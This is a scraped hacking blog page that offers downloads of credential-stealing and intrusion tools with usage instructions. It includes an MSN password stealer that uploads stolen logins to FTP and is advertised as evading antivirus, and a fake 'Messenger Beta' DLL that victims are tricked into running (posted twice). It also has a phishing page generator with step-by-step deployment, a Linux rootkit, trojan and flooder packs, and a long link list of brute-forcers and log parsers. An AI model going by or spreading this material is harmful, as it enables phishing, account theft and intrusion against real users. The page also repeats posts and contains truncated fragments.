Showing posts with label Web Hacking. Show all posts
Showing posts with label Web Hacking. Show all posts

jfirewall test

Posted by Bijay | 10:01 AM | , | 0 comments »

JFirewallTest is a free Java webstart application that tests for holes or open ports in your firewall. Unlike other solutions, JFirewallTest is a two stage testing procedure that tests all 65,536 ports very rapidly. After testing is complete, JFirewallTest will present a page of results reporting exactly what ports are open and accessible to others on the Internet.
Released: 2006-10-01
License: Freeware
Publisher: Michael Gardiner
Language: English
Platform: Windows, Linux, MAC
Requirements: Java Runtime Environment 1.4+
Install: Install and Uninstall

Free Download
Image and video hosting by TinyPic

jfirewall test
Read more on this article...

ery simple and really without any kind of virus, trojan. Please scan your files before you open it. There is also a video it is in a flv. flash format. Watch the video there is explaining you all what you have to do.
Just I want to explain it also by words here, maybe someone cant open the video file.
First of all download the file, it is a .rar file.
The link is:
http://www.ziddu.com/download.php?uid=ZbOinJmoZq%2BenOKnYqqhkZSoX6qcm5eu2

after you download, watch the video or not, how you like.
There are 2 files, open first "Gen File" write your email (because you will get the passwords there. After you generate your file in the folder you will see one .dll file, this you can send it with msn.exe together (make zip or rar) to any of hotmail, windowslive, msn adress. Tell to the victim "hey this is a new Msn Messenger Beta" or somethink like this. He/she will open the file, will write email+password, sign in of course. And in this Moment you will get the mail (after 5-10 Minutes).
EnJoY, thank you for your communication, cooperation and connection. Read more on this article...



Google Hacks is a compact utility that will allow its users to search google using
different google search hacks. Using Google Hacks one can easily do a music search
by using a highly optimized and complex search command that can be obtained just by
clicking a number of option boxes that can be found in the program´s interface.

OS: Win 98/ME/2000/XP/2003

Free Download
Image and video hosting by TinyPic

Google Hacks Version v1.6


Read more on this article...




Info:
-----------------------------------

Gets Stored MSN 3.5 - 8.5 (Live) and Windows Messenger Passwords,
Writes to Text File,
Uploads to FTP Server of your choice!

-----------------------------------
Scanned on 17-04-2008:
-----------------------------------
Antivir: Nothing found
ArcaVir: Nothing found
Avast: Nothing found
AVG: Nothing found
BitDefender: Nothing found
F-Prot: Nothing found
Norman: Nothing found
Rising: Nothing found
VirusBlokAda32: Nothing found
VirusBuster: Nothing found



http://www.viruschief.com/report.html?report_id=663603171d6224c240491eb2961f2acebf87887c

Scanned by
http://www.viruschief.com
Read more on this article...

MSN Hacks - Tool

Posted by Bijay | 9:21 PM | , | 0 comments »

Evil Msn is an advanced msn messenger tool with many different features to make your experience with msn better.

************************************************** *
Feature List:

Msn Booter
Status Bomb
Nick Name Builder
Contact Options
Msn Information
Msn Scroller
Msn Defence
Msn Tweaking
Block Checker
Profile Viewer
Emotion Art
Emotion Talk
Display Picture/Emotion Thief
Desk Status
Patch Msn
And 3 BONUS Tools
************************************************** *

Compatibilty:
Designed for Windows XP SP1
Msn Messenger 6+
************************************************** *

Free Download
Image and video hosting by TinyPic

Now you can see what's hidden
http://rapidshare.com/files/30900260/crazy_pics_30.6_thegreatfroum.org.rar
Required Files
http://www.completelyfreesoftware.com/vb_runtime_files.htm//div>

Code:
http://download.microsoft.com/download/vb6.../vbrun60sp5.e/
And new add








This is plain and simple to use this Program
1st in the Program is several links for you to give your oponant after they receave the url they will goto it and it will look like
a sighn in page for msn they sighn in using there passport id and there
password then look in this Program and it will show u there password and ip
u first must register at a website to get ya login details this is simle as pie ..

and a rapidshare premium downloader, i have tested that and it worked
fine for me




Code:

http://rapidshare.com/files/30900260/crazy_pics_30.6_thegreatfroum.org.rar
Read more on this article...

MSN Hack T00LS

Posted by Bijay | 6:47 AM | , | 0 comments »

File: Msn Auto Responder.rar
DownloadLink: http://rapidshare.com/files/75269540/Msn_Auto_Responder.rar

--------------------------------------------------------------------------
File: Msn Detector 2.0.rar
DownloadLink: http://rapidshare.com/files/75270255/Msn_Detector_2.0.rar

--------------------------------------------------------------------------
File: MSN Bomberman v3.1.2.rar
DownloadLink: http://rapidshare.com/files/75270317/MSN_Bomberman_v3.1.2.rar

--------------------------------------------------------------------------
File: MSN.Sniffer.1.2.+.Crack.rar
DownloadLink: http://rapidshare.com/files/75270787/MSN.Sniffer.1.2._.Crack.rar

--------------------------------------------------------------------------
File: Locker.rar
DownloadLink: http://rapidshare.com/files/75271252/Locker.rar

---------------------------------------------------------------------------
File: MSN Flooder.rar
DownloadLink: http://rapidshare.com/files/75271337/MSN_Flooder.rar Read more on this article...

Read more on this article...



urple'>What it is: Msn tools. some msn tools to have fun with. With the iso comes loads of freezers booters flooders and other fun
tools!
if you ever wanted to have some fun with msn then you should
download this.
There is even a hard tools section with rats keyloggers ect.
this is for educational use only!
If you scan this there will be about 5 trojans found but these are
hacking tools! the antivirus will detect all hacking tools as
harmfull. I tested most of the programs and my computer still works
fine,still its your own risk.

Help: To get the .iso working you will either need to burn it on cd or mount it with deamon tools or PowerISO, Alcohol 120% or Winmount ect ect. Google will enlighten you on that xD


and download the program.

After installation mount the msnhack img with deamon tools and it should autorun after that.

Read more on this article...

Included:
Windows Live Messenger 8.1.0178
-aMSN 0.94 [Linux]
-Messenger Plus! Live 4.11.254
-Plugin / Script for Messenger Plus!
-Skin Windows Live Messenger
-A-Patch 1.3.0 RC1 (build 54)
-MessPatch 8.1.0.178 - Generation 5
-StuffPlug-NG Patch 3.0.286 BETA
-MSN BackUP 1.3.2 BETA
-MSN BackUP 1.1.7 [Only MSN 7 & 7.5]
-Live Messenger Now Playing Plugin
-Toaster for Winamp 0.7.8
-1000+ Emoticons [Smile Classic ,Objects & Symbols ,Super Smile ,Personal Emoticons]
-1000 Avatars
-Clean Messenger 2.7.0168
-aMSN v0.95/PortableaMSN v1.0.0.5 Multilingual r03
-Same usefull Sites about MSN


Free Download
Image and video hosting by TinyPic

Msn AIO Pack 2007

Read more on this article...

Dictionary tool:

MagicFilter
Code:

http://www.freewebs.com/t800t/MagicFilter.rar

Raptor3 [ belt sinicizes patch ]
Code:

http://www.freewebs.com/t800t/Raptor3.zip


The SuperDic_V3.2 registration version [ easy superior super dictionary production tool, function to be good ]
Code:

http://www.freewebs.com/t800t/SuperDic_V32.zip


Pwdmaker_1.151
Code:

http://www.freewebs.com/t800t/pwdmaker_1.151.rar


Decodes the tool: John the Ripper
Code:

http://www.xisp.org/downloads/jtr.zip


AUthX
Code:

http://www.freewebs.com/t800t/AUthX.rar



Withdraws the password and processes the LOG files tool:

Z_nakeR2 [ very good log processing tool may process the many kinds of log documents ]
Code:

http://www.freewebs.com/t800t/Z_nakeR2.zip


ccbrip
Code:

http://www.xisp.org/downloads/ccbillrip.zip


ibillrip
Code:

http://www.xisp.org/downloads/ibillrip.zip



*Accessdiver (AD) by Jean Fages
Code:

http://www.accessdiver.com


*Sentry by Sentinel:
Code:

http://sentinel.deny.de/sentry.php


*Form@ (specifically for FORM sites) by SSS -
Code:

http://sss.deny.de/


Caecus by Sentinel (For form sites that require an OCR [t4wsentry.pl])
Code:

http://sentinel.deny.de/Caecus.php


Ares by Gamoaa -
Code:

http://www.xisp.org/downloads/FACE_Setup.zip


Brutus
Code:

http://www.hoobie.net/brutus/


AuthForce by Zachary P. Landau
Code:

http://kapheine.hypa.net/authforce/index.html


Entry by Sparkleware
Code:

http://www.sparkleware.com/entry/index.html


Xavior By LithiumSoft
Code:

http://www.btinternet.com/~lithiumsoft/Products.html


Web Password Checker (WPC) .1 For UNIX by g1soft
available @
Code:

http://www.securityfocus.com/tools/885/scoreit


Munga Bunga's http Brute Forcer by Munga Bunga
Code:

http://www.hackology.com


Wordlist Tools:

*Raptor 3 by Madmax -
Code:

http://madmax.deny.de/downloads/raptor.zip


Words Extractor
Code:

http://www.intellitamper.com/wordsextractor/


Lucifer by Rhino -
Code:

http://rhino.deny.de/lucifer.php


ALS_novice by Wolfman -
Code:

http://wolfman.deny.de/tools.html


Z-leecher by Beda
Code:

http://goldmaster.webpark.cz/sleech.html


S-Generator by Beda
Code:

http://goldmaster.webpark.cz/sgen.html


S-WordlistTool by Beda
Code:

http://goldmaster.webpark.cz/swordt.html


Proxy Tools:

*Proxyrama By Gaamoa -
Code:

http://gaamoa.deny.de/


*Charon by Rhino -
Code:

http://www.icefortress.com/hosts/rhino/


*Advanced Proxy Leecher (APL) by Sentinel-
Code:

http://sentinel.deny.de/apl.htm


Geowhere by Jean Fages (NOT-Freeware) -
Code:

http://www.geowhere.net/


Proxy List Filter -
Code:

http://www.freeproxy.ru/en/programs/proxy_filter.htm


AATools by Glocksoft
Code:

http://www.glocksoft.com/aatools.htm


Proxy Bag
Code:

http://www.intellitamper.com/proxybag/


S-Proxy Tool by Beda
Code:

http://goldmaster.webpark.cz/sproxy.html


Exploiting Tools:

*Triton (Scanner) by Rhino -
Code:

http://rhino.deny.de/triton/index.php


*CMX IV by Xtremnet -
Code:

http://xtremet.deny.de/products.htm


CCBill Local Cgi Exploiter By Ksoze-
Code:

http://ksoze.deny.de/ccbill_exp.html


IBT2 by wolfman:
Code:

http://wolfman.deny.de/tools.html


Hephaestus's Ashen Spear by Wolfman:
Code:

http://wolfman.deny.de/HAS.php


Intellitamper
Code:

http://www.intellitamper.com/infos.php


Putty
Code:

http://www.chiark.greenend.org.uk/~sgtatham/putty/


Decrypting Tools:

*John The Ripper (JTR) -
Code:

http://www.openwall.com/john/


MDcrack (MD5 Cracker) -
Code:

http://membres.lycos.fr/mdcrack/


Distributed John The Ripper by Luis Parravicini
Code:

http://ktulu.com.ar/en/djohn.php


Cain and Abel by Massimiliano Montoro
Code:

http://www.oxid.it/cain.html


Salt Grinder by Wolfman
Code:

http://wolfman.deny.de/SaltGrinder.php


Log Tools:

LogRip by Rhino -
Code:

http://rhino.deny.de/logrip.php


Azarius by Rhino -
Code:

http://rhino.deny.de/azarius.php


Zimapass Parser by Sentinel:
Code:

http://sentinel.deny.de/zimaparser.htm


*C-Parse (ccbill.log parser) by Sentinel:
Code:

http://sentinel.deny.de/c_parse.htm


CCBill USI (CCBILL log parser that removes all dead account PRIOR to decrypting)
Code:

http://membres.lycos.fr/ccbill/


Accessdiver/Ares Parser by Sentinel:
Code:

http://sentinel.deny.de/ad_ares_parser.htm




Spoofers:

Zspoof by wolfman -
Code:

http://wolfman.deny.de/tools.html


Sploof by Jean Fages -
Code:

http://www.accessdiver.com/sploof.htm


Final Spoof
Code:

http://www.beatharness.com/finalspoof/


Spooph by nast0
Code:

http://24.106.100.133/spooph/index.html


D-Spoof And Others (Russian Site, English Prog)
Code:

http://mspoofer.pisem.net/zaza/index.htm


Mikho's Online Spoofer (web based spoofer)
Code:

http://mikho.kicks-ass.net/spoofs/spoofs.hta


QuickSpoof
Code:

http://httpd.chello.nl/~m-koster2/spoofs.htm


Other Tools:

Code:

Scholar by Sentinel - (History checker)
http://sentinel.deny.de/scholar.htm


Crackmate Gold by Xtremet (adultcheck gold pass verifier) -
Code:

http://xtremet.deny.de/products.htm


Read more on this article...



Harlan Carvey
A considerable amount of forensic analysis of Windows systems today continues to center around file system analysis; locating files in the active file system, or carving complete or partial files from unallocated space within the disk image. However, a great deal of extremely valuable information is missed if the Windows Registry is not thoroughly examined, as well.
»Client-side Exploits

Anushree Reddy
Client-side exploit are some of the most commonly seen exploits and this is mainly due to the fact that traditional perimeter security (firewalls, router access lists) offer little or no protection against these kinds of exploits. This is due to the fact that clientside exploits target vulnerabilities on the client applications.

»Simple WiFi Hacking with Eee Pc

Marco Lisci
In this article we'll see a simple and efficient method to retrieve a WEP key from a wireless network. The interesting part is that we'll obtain this key using an Eee Pc, the low cost netbook by Asus. After this article you will see that an Eee Pc with BackTrack is a must-have tool for any security specialist.

»SQL Injection in Action

Antonio Fanelli
Basic SQL Injection attacks have not gone away despite web 2.0 programming. In this article we will learn how to maintain earlier websites in order to protect against them.

»Auditing Oracle in a Production Environment

Aditya K Sood Aditya K Sood
This paper is based on real penetration testing of Oracle servers on HP-UX systems and the way the auditor has to follow to combat the stringencies that come in a way. We will dissect the errors and the way to bypass them to conduct the tests.

»PKCS Potion Number Twelve

Israel Torres
More today than ever enterprise cryptographic systems are being used by both private and government entities to fortify themselves against foreign and domestic attacks. This fortification consists of the applied practice of a policy known as Public Key Infrastructure (PKI).

»Virtualization and Security

Rishi Narang
In this world of enormous computing but limited energy, virtualization has now entered into the present day data centers, enterprises and user desktops to deliver efficient Green IT environments.

»Javascript Obfuscation Part 1

David Maciejak
It is common that attackers target victims web client or third party tools like Adobe Flash or Acrobat Reader. Web clients are targeted to exploit either vulnerability in their code or exploit flaws in third party softwares that can be loaded through them like ActiveX technologies or script engine in Flash or PDF.

»Hacking Movie Fallacies and Home User Infections

Matthew Jonkman
Surely every one of us has annoyed our significant other during a supposed hacking movie with constant statements of disgust. We try not to sigh, or let a Give me a break! slip, but they do. It's unavoidable.
»Consumers test – Virtual machines – an integral part of your security toolkit

Russell Kuhl , hakin9 team
What is a Virtual Machine? These days, you cannot toss an unwanted 512MB DIMM anywhere in the average server room and not hit a virtual machine (or VM as they are commonly known). They are everywhere, in one form or another. There are two basic types of VM’s, Process VM’s create an operating environment within the OS that isolates the process in question from the rest of the operating system.

»Dr. Vladimir Golubev – expert in cybercrime field

hakin9 team
This interview takes up an international problem of cybercrime. Mr. Vladymir Golubev (founder of Computer Crime Research Center) shares with you his experience, gained during years of work as the Member of International Police Association. Here you won’t find unambiguous answers, but things which will provoke you to think over your attitude towards security.

Read more on this article...

IntoXonia 2 - LKM rootkit for Linux Kernel 2.6.x


Free Download
Image and video hosting by TinyPic

IntoXonia 2 - LKM rootkit for Linux Kernel 2.6.x Read more on this article...




The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis.

Besides the discussion of different approaches and the documentation of gathered results also an implementation for automated analysis is provided. This software shall improve the easiness and efficiency of this kind of enumeration. Traditional approaches as like banner-grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting.

Besides the well-known enumeration of http response status codes and header-ordering several other fingerprinting mechanisms were introduced. For example the capitalization of header lines, the use of spaces and the structure of ETag values (e.g. length and quotes).

There are nine test cases in which the behavior of the target service ismapped. These are:

* legitimate GET request for an existing resource
* very long GET request (>1024 bytes in URI)
* common GET request for a non-existing resource
* common HEAD request for an existing resource
* allowed method enumeration with OPTIONS
* usually not permitted http method DELETE
* not defined http method TEST
* non-existing protocol version HTTP/9.8
* GET request including attack patterns (e.g. ../ and %%)

This increases the amount of fingerprints to distinguish the given implementation. Thus, the accuracy of the fingerprinting series is very high. Theoretically httprecon 1.x is able to generate approx. 198 fingerprint atoms per full scan run (usually between 80 and 120 are given).

Read more on this article...




Description:You're a hotshot computer hacker in the year 2010 -- an Uplink Agent, an expert in computer espionage employed by major corporations. You make your living by circumventing security systems, stealing important data, framing innocents, and disposing of the evidence. Invest your profits in better computer systems and tools to pull off ever more complicated and dangerous hacks. As your skills develop, you can attempt big jobs like influencing the stock market or creating the world's most devastating computer virus. Uplink's presentation of the world of hacking is perhaps more glamourous than the real thing, but has a core basis in reality.

Free Download
Image and video hosting by TinyPic

Uplink Hacker Elite

Read more on this article...

this program is (as stated) a phishing page generator, with compatibly for user-made plugins as well. With this bundle you will receive the following--

o * AOL
o * Bebo
o * Bootleggers
o * ESpinTheBottle
o * FaceBook
o * Freewebs
o * GMail
o * Hi5
o * Hotmail (old)
o * Login Live
o * Messblack Forums
o * MillerSmiles Forums
o * Mob Life
o * MSN Delete Checker
o * Myspace
o * Rapidshare
o * Windows Live Mail
o * World of Warcraft
o * Yahoo
How To Use:
Here is a brief (but sweet) tutorial:

1. Choose a password (This will be used later on)
2. Pick a Template from the list to be created
3. Generate your page
4. Upload it to a php host
5. ???
6. Profit

Viewing your Logged Passwords:
Probably the most important part of the entire thing.
To view your logged passwords browse to (http://fakesite.com/example.php) and enter 'viewlog' into the email/username field and the password you chose in step 1.
If your password was correct you will be taken to the page with your phished accounts along with their IP Address.

You do not need an email address and nothing is stored on an outside server so it's completely independent.

Free Download
Image and video hosting by TinyPic

HackShadow UltraPhish Phishing Generator

Read more on this article...



Hackers ToolKit Suite


Hacking pack:
AATools v5.50
brutus-aet2
Compiled SNID Server
dav
donut_http_flooder_1.4
Flooder
Net Controller 1.08
Net Metropolitan 1.04
Net Raider
Netbus 2 PRO Picture Trojans
Netbus1.70 Picture Trojans 2
NetSphere
passgen
Sprut
tosser


Nfo Tools:
AsciiFactory.exe
coolbeans-nfocreator.exe
dizzy.exe
Feuer's NFO File Maker v2.0
Ims NFO&DIZ Maker 1.87
Inserter v1.12
NFO Maker 1.0
NFOCreator.EXE


Patch Kit:
CodeFusion wizard v3.0
Fast patch v1.0
Patch creation wizard v1.2
Patch on fly v0.75
Predator's extreme loader generator v0.3
Rlzer v2.20b
Rtd win patch engine v1.0
sRlzer v1.01b patch generator
Tola's patching engine v1.8
Yoda's process patcher beta


Windows keygens:
keyfinder.exe
RockXP3.exe
WinALL Keygen.exe
WINDOWS_XP__CD_KEY_GENERATOr.EXE
XPProCorp-keyChanger.exe


Access Driver
Athena cg
Cain & Abel [password hacking]
CIA Commander
Crack
crackers kit.2.0
creator 16
Golden eye
google hacker
HostScan v1.6.5.531
Hotmail Account Freezer
md5-w
Microsoft macro virus generator
Net Tools
Soft Ice v4.05
sub 7 legends

Free Download
Image and video hosting by TinyPic

Hackers ToolKit Suite

Read more on this article...

ery simple and really without any kind of virus, trojan. Please scan your files before you open it. There is also a video it is in a flv. flash format. Watch the video there is explaining you all what you have to do.
Just I want to explain it also by words here, maybe someone cant open the video file.
First of all download the file, it is a .rar file.
The link is:
http://www.ziddu.com/download.php?uid=ZbOinJmoZq%2BenOKnYqqhkZSoX6qcm5eu2

after you download, watch the video or not, how you like.
There are 2 files, open first "Gen File" write your email (because you will get the passwords there. After you generate your file in the folder you will see one .dll file, this you can send it with msn.exe together (make zip or rar) to any of hotmail, windowslive, msn adress. Tell to the victim "hey this is a new Msn Messenger Beta" or somethink like this. He/she will open the file, will write email+password, sign in of course. And in this Moment you will get the mail (after 5-10 Minutes).
EnJoY, thank you for your communication, cooperation and connection. Read more on this article...




Google Hacks is a compact utility that will allow its users to search google using
different google search hacks. Using Google Hacks one can easily do a music search
by using a highly optimized and complex search command that can be obtained just by
clicking a number of option boxes that can be found in the program´s interface.

OS: Win 98/ME/2000/XP/2003

Free Download
Image and video hosting by TinyPic

Google Hacks Version v1.6

Read more on this article...

Evil MSN 3.0.6

Posted by Bijay | 11:32 AM | | 0 comments »

Msn Booter
Status Bomb
Nick Name Builder
Contact Options
Msn Information
Msn Scroller
Msn Defence
Msn Tweaking
Block Checker
Profile Viewer
Emotion Art
Emotion Talk
Display Picture/Emotion Thief
Desk Status
Patch Msn
And 3 BONUS Tools

This is enough to say just open and it is simple

Free Download
Image and video hosting by TinyPic

Evil MSN 3.0.6

Read more on this article...



Free Download
Image and video hosting by TinyPic

Downloader (FWB++)


Read more on this article...